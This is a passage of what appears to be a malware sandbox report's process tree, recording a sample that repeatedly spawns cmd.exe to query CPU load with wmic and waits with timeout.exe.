  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1036
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3028
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4048
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1840
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4696
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2292
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1240
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3992
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1608
